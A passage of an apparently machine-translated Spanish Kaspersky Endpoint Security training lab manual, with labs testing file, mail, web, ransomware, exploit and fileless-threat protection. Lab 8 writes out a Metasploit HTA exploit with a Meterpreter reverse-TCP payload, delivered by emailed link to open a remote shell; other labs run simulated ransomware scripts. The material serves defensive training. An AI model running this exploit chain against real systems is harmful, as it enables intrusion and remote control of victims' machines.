Laboratorio 4.

Cómo probar la protección contra amenazas de archivos

La tarea se realiza en Tom-Laptop.


los corriente continua y Centro de Seguridad Las máquinas deben estar encendidas.

1. Presione WIN + R

2. Escriba wsl

3. Haga clic en Okay

4) Copie el código fuente del cuentagotas eicar a / tmp: carpeta

cp /mnt/c/temp/eicar_drop_kl_edu.cpp / tmp /

5) Ve a la / tmp: directorio

cd / tmp /

6) Compile el gotero eicar usando el g ++ compilador:

g ++ eicar_drop_kl_edu.cpp -o eicar_dropper

7) Ejecute el cuentagotas eicar compilado:

. / eicar_dropper

8) Haga clic en Kaspersky Endpoint Security


icono en el área de notificación o en el menú Inicio
para abrir la interfaz de Kaspersky Endpoint
Security

9. Haga clic en Informes en la esquina inferior izquierda

esquina
L – 36 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

10. Seleccione el Protección contra amenazas de archivos

reporte

11) Encuentra el evento de detección de amenazas

12) Encuentra los resultados de procesar esto


amenaza

Conclusión

Este laboratorio demuestra cómo Kaspersky Endpoint Security puede detectar archivos maliciosos que se guardan o crean dentro del Subsistema de Windows para Linux.

Laboratorio 5.

Cómo configurar la Protección contra amenazas de correo

Guión. Sus computadoras en red están protegidas con Kaspersky Endpoint Security. Cuando un administrador envía por correo electrónico un archivo ejecutable a un usuario que lo ejecutará y así
resolver un problema, Kaspersky Endpoint Security cambia el nombre del archivo adjunto. Para ahorrar tiempo y evitar explicar a los usuarios cómo cambiarles el nombre, configure Mail Threat
Protection para que no cambie el nombre de los archivos. Al mismo tiempo, los delincuentes suelen utilizar archivos con doble extensión para engañar a los usuarios para que ejecuten un ejecutable
malicioso disfrazado de documento.

Contenido. En esta práctica de laboratorio, configure Mail Threat Protection para que no cambie el nombre de los archivos adjuntos * .exe, sino que cambie el nombre de los archivos con doble

extensión * .pdf.exe.

1) Enviar un mensaje con un archivo ejecutable


2) Edite el filtro de archivos adjuntos

3) Asegúrese de que Mail Threat Protection ya no edita archivos adjuntos

Tarea A: Enviar un mensaje con un archivo ejecutable

Envíe un mensaje a tom@abc.lab con un archivo comprimido * .pdf.exe adjunto. Reciba el mensaje y asegúrese de que Mail Threat Protection haya cambiado la
extensión del archivo archivado.
L – 37
Laboratorio 5.

Cómo configurar la Protección contra amenazas de correo

La tarea se realiza en Alex-Desktop.


los corriente continua y Centro de Seguridad Las máquinas deben estar encendidas.

1. Comience la tarea en Alex-Desktop.

2) Crea un nuevo mensaje:

- Especifique el destinatario. En el A: Tipo de campo


Tom@abc.lab
- En el Tema: caja, tipo Reporte semanal
- Adjunta Document1.zip presentar el mensaje (pregunte al
entrenador dónde está ubicado)

3. Haga clic en Enviar para enviar el mensaje

Cambiar a Tom-Laptop

4. Ejecutar Microsoft
Panorama. Seleccione el
mensaje recibido

5. Guarde el
Document1.zip archivo al
escritorio

6. Desempaquete el Document1.zip archivo (seleccione el


Extraer todo comando en el menú contextual del archivo)

7) Tenga en cuenta que el archivo archivado se llama

Document1.pdf.ex_. Mail Threat Protection ha cambiado la


extensión del archivo ejecutable archivado

Tarea B: Edite el filtro de archivos adjuntos

En la política de Kaspersky Endpoint Security, edite la lista de formatos de archivos adjuntos que Mail Threat Protection elimina.
L – 38 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Alex-Desktop, y Tom-Laptop Las máquinas deben estar encendidas.

8. Abra Kaspersky
Consola web del centro de
seguridad

9. Ir a Dispositivos | Políticas
Y perfiles

10. Abra la política


Kaspersky Endpoint
Security para Windows
(11.1.0)

11. Cambie a la
Configuraciones de la aplicación

lengüeta

12. Abra el Esencial


Protección contra amenazas

sección

13. Abra el Amenaza de correo


Proteccion ajustes

14. Reconfigurar el archivo adjunto

filtración. Escoger Eliminar archivos

adjuntos de tipos seleccionados


L – 39
Laboratorio 5.

Cómo configurar la Protección contra amenazas de correo

15. Desplácese por la lista de configuraciones

abajo

16. Desactivar procesamiento

* *. exe

17. Crear un nuevo archivo adjunto

filtro: haga clic Añadir

18. En el Extensión campo,


tipo *. pdf.exe

19. Haga clic en Okay

20. Asegúrese de que el


* *. pdf.exe el filtro de archivos
adjuntos se muestra en la lista

21. Haga clic en Okay

22. Haga clic en Salvar para salvar el

política

23. Espera a que la política sea


forzado

Tarea C: Asegúrese de que Mail Threat Protection ya no edita archivos adjuntos


L – 40 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

La tarea se realiza en Alex-Desktop.


los CORRIENTE CONTINUA, Centro de Seguridad, y Tom-Laptop Las máquinas deben estar encendidas.

24. En el Alex-Desktop máquina, crea otro mensaje. Adjunta


Procmon.zip archivo (pregunte al instructor dónde se encuentra este archivo)

25. En el Tema: caja, tipo Servicio de TI

26. Haga clic en Enviar

Cambiar a Tom-Laptop

27. abierto Microsoft


panorama

28. Guarde el Procmon.zip


archivo al escritorio

29. Desempaquete el Procmon.zip archivo (seleccione el


Extraer todo comando en el menú contextual del archivo)

30) Tenga en cuenta que en el nuevo mensaje, el archivo archivado es

llamado Procmon.exe; Mail Threat Protection no lo ha


renombrado

Conclusión

Ha configurado la Protección contra amenazas de correo para que no cambie el nombre de los archivos .exe.

Si la red está siendo atacada por correo electrónico por un nuevo virus que aún no se ha agregado a la base de datos de firmas o KSN, configure la Protección contra amenazas de correo para cambiar

el nombre o eliminar todos los archivos adjuntos ejecutables.


L – 41
Laboratorio 6.

Cómo probar la Protección contra amenazas web

Laboratorio 6.

Cómo probar la Protección contra amenazas web

Guión. Kaspersky Endpoint Security puede escanear el tráfico https con la configuración predeterminada. Reemplaza el certificado para este propósito, que a veces puede
afectar la banca y otro software que utiliza un certificado propio. Para evitar problemas de interacción, Kaspersky Endpoint Security permite excluir el tráfico cifrado de la
exploración.

Contenido. En este laboratorio, haremos lo siguiente:

1) Asegúrese de que la Protección contra amenazas web analice el tráfico https en la configuración predeterminada

2) Desactive el análisis de tráfico cifrado para la aplicación PowerShell


3) Asegúrese de que Web Threat Protection permita a la aplicación confiable PowerShell descargar el virus de prueba a través de https

Tarea A: Asegúrese de que la Protección contra amenazas web analice el tráfico https de forma predeterminada

Ejecute PowerShell, intente descargar el eicar_com.zip archivo y compruebe cómo reaccionará Kaspersky Endpoint Security.

La tarea se realiza en Tom-Laptop.


los corriente continua y Centro de Seguridad Las máquinas deben estar encendidas.

1. Presione WIN + R

2. Escriba potencia Shell

3. Haga clic en Okay

4) Descargar el eicar_com.zip archivo a través de PowerShell sobre https. Ejecute el siguiente comando:

Invoke-WebRequest –uri "https://secure.eicar.org/eicar_com.zip" -OutFile "C: \ temp \ eicar_com.zip"

5) Asegúrese de que Kaspersky Endpoint Security haya bloqueado la descarga. No cierre la ventana de PowerShell

Tarea B: Desactive el análisis de tráfico cifrado para la aplicación PowerShell

Agregue PowerShell a la lista de aplicaciones confiables, intente descargar el eicar_com.zip archivo y compruebe cómo reaccionará Kaspersky Endpoint Security.
L – 42 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

La tarea se realiza en Centro de Seguridad.


los corriente continua y Tom-Laptop Las máquinas deben estar encendidas.

6) Abra Kaspersky Security


Consola web central

7. Ir a Dispositivos | Políticas
Y perfiles

8. Abra la política
Kaspersky Endpoint
Security para Windows
(11.1.0)

9. Cambie a la Solicitud
Configuraciones lengüeta

10. Abra el General


Configuraciones sección

11. Abrir Exclusiones

12. Para agregar un confiable

aplicación, haga clic en el enlace

Aplicaciones de confianza en la
esquina inferior izquierda de la
ventana

13. Haga clic en Añadir


L-43
Laboratorio 6.

Cómo probar la Protección contra amenazas web

14. Para la ruta de la aplicación,


tipo
% systemroot% \ system32 \

WindowsPowershell \ v1.0 \

powershell.exe

15. Borrar lo siguiente


casillas de verificación:

No escanee archivos abiertos

No herede las restricciones del


proceso primario (aplicación)

16. Seleccione

No escanee el tráfico de
red | Solo tráfico cifrado

17. Haga clic en Okay tres veces para

guardar la exclusión

18. Haga clic en Salvar para salvar el

política

19. Confirma que quieres


use la configuración especificada: haga clic

en si

20. Espera a que la política sea


forzado

Tarea C: Asegúrese de que Web Threat Protection permita a la aplicación confiable PowerShell descargar el
virus de prueba a través de https

Descargar el eicar_com.zip archivo de la www.eicar.org sitio web a través de la aplicación PowerShell una vez más. Asegúrese de que la Protección contra amenazas web no
bloqueará el virus de prueba si se descarga a través de una aplicación confiable.

La tarea se realiza en Tom-Laptop.


Las máquinas corriente continua y Centro de Seguridad debe estar encendido

21) Descargue eicar_com.zip sobre el https protocolo seguro una vez más. Ejecute el siguiente comando:

Invoke-WebRequest –uri https://secure.eicar.org/eicar_com.zip -OutFile "C: \ temp \ eicar_com.zip"


L-44 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

22) Para asegurarse de que el archivo ha sido


guardado correctamente, abra el C: \ temp \
directorio

23. Cerrar el Potencia Shell ventana

Conclusión

Este laboratorio muestra cómo agregar una aplicación a la lista de confianza y evitar escanear su tráfico encriptado.

La opción No escanee el tráfico de red configurado para programas confiables se aplica a los componentes de Protección contra amenazas de correo electrónico, Protección contra
amenazas web y Control web, y no influye en el Firewall o la Protección contra amenazas de red.

Laboratorio 7.

Cómo probar la protección de carpetas de red contra


ransomware

Guión. Sus computadoras de red están protegidas con Kaspersky Endpoint Security y administradas a través de Kaspersky Security Center. De todas las amenazas, le
preocupa más el ransomware que cifra los datos en carpetas compartidas. Si Kaspersky Endpoint Security no puede detectar una nueva versión de malware algún día, la
compañía perderá mucho dinero. Quieres usar el Detección de comportamiento componente de protección para contrarrestar el ransomware.

Contenido. En este laboratorio, haremos lo siguiente:

1) Simular una infección de ransomware


2) Compruebe cómo reaccionó el componente de protección de detección de comportamiento

3) Permita el cifrado dentro de carpetas compartidas de red y configure exclusiones para dispositivos de red
4) Asegúrese de que las exclusiones para dispositivos de red funcionen correctamente

Tarea A: Simular una infección de ransomware

Busque el script ransomware2.bat en el escritorio de la computadora Alex-Desktop y ejecútelo. Imita el ransomware: encripta archivos en carpetas de red
compartidas y elimina los originales.

Asegúrese de que Kaspersky Endpoint Security 11.1 haya restaurado el archivo invoice.txt y que el usuario Alex ya no pueda modificar archivos en la carpeta compartida de la
red.
L-45
Laboratorio 7.

Cómo probar la protección de carpetas de red contra ransomware

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Alex-Desktop, y Tom-Laptop Las máquinas deben estar encendidas.

1) Abra Kaspersky Security


Consola web central

2. Ir a Dispositivos | Políticas
Y perfiles

3. Abra la política
Kaspersky Endpoint
Security para Windows
(11.1.0)

4. Cambie a la Solicitud
Configuraciones lengüeta

5. En Protección avanzada contra amenazas, Seleccione


Prevención de intrusiones del
huésped

6. Desactivar Intrusión de host

Prevención

7. Haga clic en Okay


L – 46 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

8. En Protección esencial contra


amenazas, Seleccione

Cortafuegos

9. Desactiva el Cortafuegos

10. Haga clic en Okay

11. Guarde la configuración: haga clic en

Salvar

12) Confirma que quieres


use la configuración especificada: haga clic

en si

13. Espere a que la política sea


forzado

14.! Reiniciar el Tom-


Ordenador portátil computadora

Cambiar a la Alex-Desktop máquina.


L – 47
Laboratorio 7.

Cómo probar la protección de carpetas de red contra ransomware

15. Abra la carpeta compartida \\ tom-laptop \ temp

16. Asegúrese de que el factura.txt el archivo esta ahi

17. Encuentra el ransomware2.bat archivo en el escritorio. Eso


imita acciones de ransomware de cifrado de archivos

18. Ejecute el ransomware2.bat archivo

19) Consulte el contenido de la carpeta \\ tom-


laptop \ temp

20. Abra el invoice.txt.aes archivo en el Bloc de notas

21. Asegúrese de que el invoice.txt.aes el archivo es


encriptado

22. Cerrar el Bloc de notas

23) Actualizar el contenido de la carpeta \\ tom-


laptop \ temp

24. Asegúrese de que el factura.txt el archivo ha sido


recreado

A veces, el archivo original no se elimina porque la detección de


comportamiento bloquea la conexión remota tan pronto como detecta
el cifrado remoto, antes de que el script elimine el archivo original.

25) Intenta eliminar el archivo encriptado

26) Asegúrese de que el acceso sea denegado


L – 48 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

Tarea B: Compruebe cómo reaccionó el componente de detección de comportamiento en la máquina TomLaptop

Consulte el informe del componente de protección de detección de comportamiento en Tom-Laptop. Tenga en cuenta las acciones que realizó el componente de protección.

La tarea se realiza en Tom-Laptop.


los CORRIENTE CONTINUA, Centro de Seguridad, y Alex-Desktop Las máquinas deben estar encendidas.

27. Inicie sesión en el abc \ Tom


cuenta, contraseña
Ka5per5Ky

28) Abra Kaspersky Endpoint


Interfaz de seguridad

29. Abra la aplicación


informes

30. Seleccione Detección de comportamiento

31. Asegúrese de que el


actividad de cifrado malicioso
intentada desde IP
10.28.0.100 fue bloqueado

32. Asegúrese de que el


C: \ temp \ invoice.txt el archivo fue

restaurado
L – 49
Laboratorio 7.

Cómo probar la protección de carpetas de red contra ransomware

Tarea C: Permita el cifrado dentro de las carpetas compartidas de la red y configure exclusiones para
dispositivos de red confiables

En algunos casos, Detección de comportamiento puede considerar las operaciones realizadas por aplicaciones de ingeniería de diseño como actividades de criptoransomware. Para
evitar falsos positivos, le recomendamos que agregue computadoras de confianza. Seleccione el Servidor de Administración y edite la política de Kaspersky Endpoint Security. Agregue la
dirección IP de la computadora Alex-Desktop a la lista de exclusiones de Detección de comportamiento componente.

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Alex-Desktop, y Tom-Laptop Las máquinas deben estar encendidas.

33. Abra Kaspersky


Consola web del centro de
seguridad

34. Ir a Dispositivos | Políticas


Y perfiles

35. Abra la política


Kaspersky Endpoint
Security para Windows
(11.1.0)

36. Cambie a la
Configuraciones de la aplicación

lengüeta

37. En Amenaza avanzada


Proteccion, Seleccione

Detección de comportamiento

38. Reconfigurar la protección


de carpetas compartidas contra
cifrado externo: cambie la
acción de
Bloquear la conexión a
Informar

39. Para crear una exclusión,


hacer clic Añadir
L – 50 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

40. Crear una exclusión.


Escriba la dirección IP de la
estación de trabajo
Alex-Desktop ( 10.28.0.100)

41. Haga clic Okay dos veces

42. Guarde los cambios en el


política

Tarea D: Asegúrese de que las exclusiones para dispositivos de red confiables funcionen correctamente

La tarea se realiza en Alex-Desktop.


los CORRIENTE CONTINUA, Centro de Seguridad, y Tom-Laptop Las máquinas deben estar encendidas.

43) Sobre el Alex-Desktop máquina, cierre sesión y vuelva a encenderla

44. Abra la carpeta \\ tom-laptop \ temp \

45. Eliminar el archivo invoice.txt.aes

46. ​Encuentra el ransomware2.bat archivo en el escritorio

47. Ejecute el ransomware2.bat archivo

48. Asegúrese de que el factura.txt el archivo ha sido


cifrado y el archivo original invoice.txt no se ha restaurado

49. Eliminar el archivo invoice.txt.aes

50 Asegúrese de que el archivo se haya eliminado correctamente

Conclusión

En este laboratorio, demostramos que Kaspersky Endpoint Security puede detectar actividad maliciosa de ransomware con la configuración predeterminada. El componente de
detección de comportamiento se encarga de eso.

Si es necesario, el administrador siempre puede especificar exclusiones para el componente de protección y permitir que dispositivos de red específicos cifren archivos en carpetas
compartidas.
L – 51
Laboratorio 8.

Cómo verificar el estado de prevención de exploits

Laboratorio 8.

Cómo verificar el estado de prevención de exploits

Guión. Los delincuentes pueden explotar vulnerabilidades mucho más fácilmente de lo que uno podría imaginar. Con una herramienta tan poderosa como Metasploit Framework, un criminal
puede crear un exploit y enviarlo a empleados desprevenidos de la compañía.

Contenido. En este laboratorio, haremos lo siguiente:

1) Simule un ataque de piratas informáticos explotando una vulnerabilidad en PowerShell y obtenga acceso a una computadora remota
2) Habilite la protección contra exploits

Tarea A: Simule un ataque de piratas informáticos explotando una vulnerabilidad en PowerShell y obtenga acceso a
una computadora remota

En la computadora Kali, ejecute la utilidad de penetración Metasploit Framework. Ataque HTA (Aplicación HTML) a través de PowerShell.

La tarea se realiza en Tom-Laptop.


los CORRIENTE CONTINUA, Centro de Seguridad, Alex-Desktop, y Kali Las máquinas deben estar encendidas.

1. Salir Kaspersky Endpoint Security: Haga clic derecho en su icono en el área de notificación
y en el menú contextual, seleccione Salida

Cambiar a la Kali computadora.

2) Inicie sesión en el raíz cuenta. Contraseña- Ka5per5Ky

3) Abrir una ventana de terminal

4) Iniciar el Metasploit Framework consola. Ejecute el siguiente comando:

msfconsole

5) Selecciona la plantilla de exploit. Ejecute el siguiente comando:

use exploit / windows / misc / hta_server

Puede usar la tecla TAB para autocompletar comandos

6) Muestra la lista de aplicaciones vulnerables a este exploit. Ejecute el siguiente comando:

mostrar objetivos
L – 52 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

7) Seleccione para atacar PowerShell x64. Ejecute el siguiente comando:

establecer objetivo 1

8) Especifique la carga maliciosa. Llevar a cabo

establecer PAYLOAD windows / x64 / meterpreter / reverse_tcp

9) Especifique la dirección del servidor de escucha (dirección del Kali computadora). Ejecute el siguiente comando:

establecer LHOST 10.28.0.50

10) Activa el exploit. Llevar a cabo

explotar -j

11) Copie el enlace (clic derecho, Copiar enlace) http://10.28.0.50:8080/<name del archivo generado> .hta desde la terminal a
el portapapeles

12) Abrir una nueva instancia de terminal

13) comienzo Mozilla Thunderbird. En la terminal, escriba

Thunderbird

14) Crea un nuevo mensaje:

- Especifique el destinatario. En el A: caja, tipo Tom@abc.lab

- En el Tema: caja, tipo Reporte


- Pegue el enlace desde el portapapeles ( http://10.28.0.50/<name del archivo
generado> .hta) al cuerpo del mensaje

15. Haga clic en Enviar para enviar el mensaje


L – 53
Laboratorio 8.

Cómo verificar el estado de prevención de exploits

Cambiar a Tom-Laptop.

16. abierto Microsoft


panorama

17. Seleccione el recibido


mensaje

18. Abra el enlace desde


mensaje en un navegador

19. Guarde el archivo en


computadora

20) En la ventana de advertencia, haga clic en correr

Cambiar a la Kali computadora.

21) Abre el Metasploit Framework consola.

22) Asegúrese de que se haya abierto una nueva sesión

23) Conéctese a la sesión creada. Ejecute el siguiente comando:

sesiones 1

donde 1 es el número de la sesión creada recientemente

24) Tiene acceso remoto completo a la Tom-Laptop máquina

25) correr Símbolo del sistema Ejecute el siguiente comando:

cáscara

Entonces puedes llevar a cabo el quién soy comando para obtener el nombre del usuario activo

quién soy
L – 54 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

Tarea B: Desactiva la mayoría de los componentes de protección.

En esta tarea, deshabilitará la mayoría de los componentes de protección de Kaspersky Endpoint Security.

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Alex-Desktop, y Tom-Laptop Las máquinas deben estar encendidas.

26. Abra Kaspersky


Consola web del centro de
seguridad

27. Ir a Dispositivos | Políticas


Y perfiles

28. Abra la política


Kaspersky Endpoint
Security para Windows
(11.1.0)

29. Cambie a la
Configuraciones de la aplicación

lengüeta

30. Desactiva lo siguiente


componentes de protección:

- KSN
- Detección de
comportamiento

31. Cambiar a Esencial


Protección contra amenazas

32. Desactiva lo siguiente


componentes de protección:

- Protección contra
amenazas de
archivos

- Protección contra
amenazas web

- Protección contra
amenazas de correo

33. Haga clic en Salvar ahorrar

la configuración de la política
Confirme que desea utilizar la
configuración especificada: haga clic
en si

34. Espere a que la política sea


aplicado
L-55
Laboratorio 8.

Cómo verificar el estado de prevención de exploits

Tarea C: Prueba de protección contra exploits

En esta tarea, habilitará el componente de Prevención de exploits y lo probará.

La tarea se realiza en Tom-Laptop.


los CORRIENTE CONTINUA, Kali Alex-Desktop, y Tom-Laptop Las máquinas deben estar encendidas.

35) Cerrar la ventana del navegador web

36.! Reinicie el Tom-Laptop computadora

37) Inicie sesión en el sistema

38) Abra la ventana principal de Kaspersky Endpoint.


Seguridad

39. Haga clic en el Componentes de protección zona

40. Asegúrese de que el Prevención de exploits


componente está habilitado

41. Ir a la Descargas directorio

42. Ejecute el *. hta archivo

43) Tenga en cuenta que se ha producido un error de ejecución del script

44) En la ventana Error de script, haga clic en No


L – 56 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

45 Abrir informes de Kaspersky Endpoint Security

46) Cambie al informe de la Prevención de exploits


componente

47) Asegúrate de que se haya detectado el exploit

Cambiar a la Kali computadora.

48. Inicie sesión en raíz cuenta. Contraseña- Ka5per5Ky

49. Abra el Metasploit consola

50 Ejecute el siguiente comando:

sesiones

51) Tenga en cuenta que no hay sesiones activas sobre el criminal


computadora

Conclusión

En este laboratorio, nos aseguramos de que el sistema de defensa multinivel de Kaspersky Endpoint Security permita repeler amenazas avanzadas incluso cuando los componentes de protección
principales están deshabilitados.

Laboratorio 9.

Cómo probar la protección contra amenazas sin archivos

Guión. Recientemente, se ha popularizado un nuevo vector de amenazas, que utiliza PowerShell, una poderosa herramienta de administración y administración del sistema operativo. Los
delincuentes pueden ejecutar su código en el espacio de direcciones del proceso de PowerShell. Un ataque sin archivos es difícil de detectar ya que el código malicioso se ejecuta en la memoria, a
diferencia de un virus común que almacena sus archivos en el disco local. Por lo general, los ataques a través de PowerShell se realizan después de que la máquina se ha visto comprometida
utilizando otras acciones maliciosas, por lo general, la explotación de vulnerabilidades de software.

Contenido. En este laboratorio, deshabilitaremos KSN y probaremos cómo la interfaz de escaneo antimalware ( AMSI) detecta amenazas sin archivos.
L – 57
Laboratorio 9.

Cómo probar la protección contra amenazas sin archivos

Asegúrese de que AMSI detecte amenazas sin archivos

La tarea se realiza en Tom-Laptop.


los CORRIENTE CONTINUA, Centro de Seguridad, y Alex-Desktop Las máquinas deben estar encendidas.

1. Abra c: \ temp

2. Desempaquete el bsstest_amsi archivo

3) Introduce la contraseña infectado

4. Presione WIN + R

5. Escriba potencia Shell

6. Haga clic en Okay

7) Vaya al directorio del script desempaquetado. Llevar a cabo

cd c: \ temp \ bsstest_amsi \ bsstest_amsi

8) Ejecute el script de prueba de PowerShell. Ejecute el siguiente comando:

. \ bsstest_amsi.ps1

9) Asegúrese de que Kaspersky Endpoint Security bloquea el script


L-58 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

10) Abrir informes de Kaspersky Endpoint Security

11. Seleccione Proveedor de protección AMSI

12) Asegúrese de que Kaspersky Endpoint Security tenga


detectado y neutralizado la amenaza

Conclusión

Se ha asegurado de que incluso si algunos de los componentes de protección están deshabilitados, Kaspersky Endpoint Security puede interactuar de manera eficiente con los intérpretes de
script integrados en los sistemas operativos Microsoft Windows para detectar y bloquear el código malicioso.

Laboratorio 10.

Mejore la protección de las estaciones de trabajo contra


ransomware

Guión. Sus computadoras de red están protegidas con Kaspersky Endpoint Security y administradas a través de Kaspersky Security Center. De todas las amenazas, le
preocupa más el crypto ransomware. Si Kaspersky Endpoint Security no puede detectar una nueva versión de malware algún día, la compañía perderá mucho dinero. Para
disminuir el riesgo, configure Host Intrusion Prevention para prohibir que todos los programas, excepto los de confianza, editen documentos en las computadoras.

Contenido. En este laboratorio, haremos lo siguiente:

1) Simular una infección de ransomware


2) Prohibir que todos los programas, excepto los de confianza, editen y eliminen documentos
3) Configure los eventos de Host Intrusion Prevention para que se almacenen en el Servidor de Administración

4) Simule el cifrado de un documento y verifique el resultado

Tarea A: Simular una infección de ransomware

Encuentra el ransomware.bat guión en el escritorio de la Tom-Laptop computadora y ejecutarlo. Está diseñado para encriptar documentos de texto y eliminar los archivos
originales.
L – 59
Laboratorio 10.

Mejore la protección de las estaciones de trabajo contra ransomware

La tarea se realiza en Tom-Laptop.


los CORRIENTE CONTINUA, Centro de Seguridad, y Alex-Desktop Las máquinas deben estar encendidas.

1. Encuentra el ransomware.bat y factura.txt archivos en el


escritorio

2. Ejecute el ransomware.bat archivo

3) Asegúrese de que el factura.txt el archivo se ha ido y el


invoice.txt.aes el archivo ha aparecido en su lugar

4. Abra el invoice.txt.aes archivo en el Bloc de notas

5) Asegúrese de que el invoice.txt.aes el archivo está encriptado

6. Cerrar el Bloc de notas

Tarea B: Prohibir que todos los programas, excepto los de confianza, editen y eliminen documentos

Abra la configuración de Host Intrusion Prevention en la política de Kaspersky Endpoint Security. Encuentra la lista de recursos protegidos. Crear un Documentos categoría. Agregar
archivos con el *. TXT extensión a la misma. Prohíba que todos los programas, excepto los de confianza, editen, eliminen y creen archivos de esta categoría.

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Tom-Laptop, y Alex-Desktop Las máquinas deben estar encendidas.

7. Abra Kaspersky
Consola web del centro de
seguridad

8. Ir a Dispositivos | Políticas
Y perfiles

9. Abra la política
Kaspersky Endpoint
Security para Windows
(11.1.0)

10. Cambie a la
Configuraciones de la aplicación

lengüeta

11. En Amenaza avanzada


Proteccion, Seleccione Prevención de

intrusiones del huésped


L – 60 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

12. Habilitar Intrusión de host


Prevención

13. Para abrir la lista de


derechos, haga clic en el enlace

Derechos de solicitud y
recursos protegidos.

14. Para crear un nuevo

categoría, en el panel izquierdo,

haga clic en Añadir

15. Seleccione Categoría de

recursos protegidos

16. Tipo Archivos protegidos


para el nombre de la categoría

17. Haga clic en el Operando

sistema enlace

18. Seleccione el Personal


datos subcategoría

19. Haga clic en Okay dos veces


L – 61
Laboratorio 10.

Mejore la protección de las estaciones de trabajo contra ransomware

20. Para crear una subcategoría,


en el panel izquierdo, haga clic en

Añadir

21. Seleccione Categoría de

recursos protegidos

22. Especifique Documentos para

el nombre

23. Haga clic en el Operando

sistema enlace

24. Especifique el Protegido


Archivos subcategoría

25. Click Okay dos veces

26. Agregue tipos de archivo a

categoría. En el panel izquierdo,

haga clic en Añadir


L – 62 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

27. Para el tipo de recurso,


Seleccione Archivo o carpeta

28. En el Camino cuadro, ingrese

* *. TXT, y en el Nombre para mostrar Tipo


de campo TXT

29. Haga clic en el Operando

sistema enlace

30. Especifique el Documentos


subcategoría

31. Haga clic Okay dos veces

32. Especifique los derechos para

categoría creada: seleccione la


categoría Datos personales |
Archivos protegidos | Documentos
| *.TXT

33. Haga clic en el *. TXT fila

34. Prohibir aplicaciones


eso tiene Bajo y Alto restringido reputación
de editar los archivos que
pertenecen a esta categoría:
cambiar la acción para Escribir,
borrar, y Crear

operaciones a Bloquear

35) Configure Host Intrusion Prevention para registrar intentos de editar documentos. Habilitar Registrar eventos Para el Escribir, borrar, y
Crear comportamiento

36) Hacer clic Okay dos veces para guardar los derechos de acceso

37) Hacer clic Salvar para guardar la política

38) Espere a que se aplique la política


L – 63
Laboratorio 10.

Mejore la protección de las estaciones de trabajo contra ransomware

Tarea C: Configure los eventos de Host Intrusion Prevention para que se almacenen en el Servidor de
Administración

Abrir la configuración de eventos en la política. Encuentre eventos de información de Host Intrusion Prevention: Solicitud colocada en grupo restringido y Se activó la regla de control
de privilegios de la aplicación. Configure la política para almacenar estos eventos en el Servidor de Administración.

La tarea se realiza en Centro de Seguridad.


los CORRIENTE CONTINUA, Tom-Laptop, y Alex-Desktop Las máquinas deben estar encendidas.

39. Abra Kaspersky


Consola MMC del Centro
de seguridad

40. Abra el
Kaspersky Endpoint
Security para Windows política

41. Cambie a la Configuración de eventos sección y abra el Informacion


lengüeta

42) Haga clic en el encabezado Tipo de evento para ordenar la lista alfabéticamente y

selecciona el evento Solicitud colocada en grupo restringido

43) Abra las propiedades del evento: haga clic en Propiedades boton de abajo
la lista
L – 64 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

44) Configure el almacenamiento del evento en el Servidor de Administración

base de datos: Seleccione En el Servidor de Administración por (días) y haga clic Okay

45 Selecciona el evento La prevención de intrusiones del host se activó


y haga clic Propiedades

46) Configure el almacenamiento del evento en el Servidor de Administración

base de datos: Seleccione En el Servidor de Administración por (días) y haga clic Okay

47. Haga clic Salvar para guardar la política

48) Espere a que se aplique la política


L – 65
Laboratorio 10.

Mejore la protección de las estaciones de trabajo contra ransomware

49. Abra la consola web

50. Cambie a la
Monitoreo e informes |
Selecciones de eventos lengüeta

51. Para crear un nuevo evento

selección, haga clic Añadir

52. Tipo Intrusión de host


Eventos de prevención para el

nombre de selección

53. Cambie a la Eventos


sección

54. En el nombre de la aplicación


lista, seleccione Kaspersky
Endpoint Security

55. Seleccione la gravedad


Nivel Informacion

56. Seleccione el Incluir


eventos generales casilla de

verificación

57. En la lista de eventos,


Seleccione

- Solicitud colocada en
grupo restringido

- Se activó la prevención de
intrusiones del host

58. Haga clic en Salvar


L – 66 KASPERSKY LAB ™

KL 002.11.1: Kaspersky Security Center 11 y Kaspersky Endpoint Security 11.1

Tarea D: Simule el cifrado de un documento y verifique el resultado

Encuentra el ransomware.bat guión en el escritorio de la Alex-Desktop computadora y ejecutarlo. Está diseñado para encriptar documentos de texto y eliminar los archivos
originales. Asegúrese de que el script no pueda eliminar el archivo de texto esta vez.

Consulte los eventos de Host Intrusion Prevention en el Servidor de Administración. Asegúrese de que fue Host Intrusion Prevention lo que no permitió que el script
elimine el documento de texto.

La tarea se realiza en Alex-Desktop.


los CORRIENTE CONTINUA, Tom-Laptop, y Centro de Seguridad Las máquinas deben estar encendidas.

59) Encuentra el ransomware.bat y factura.txt archivos en el escritorio

60 Ejecutar el ransomware.bat archivo

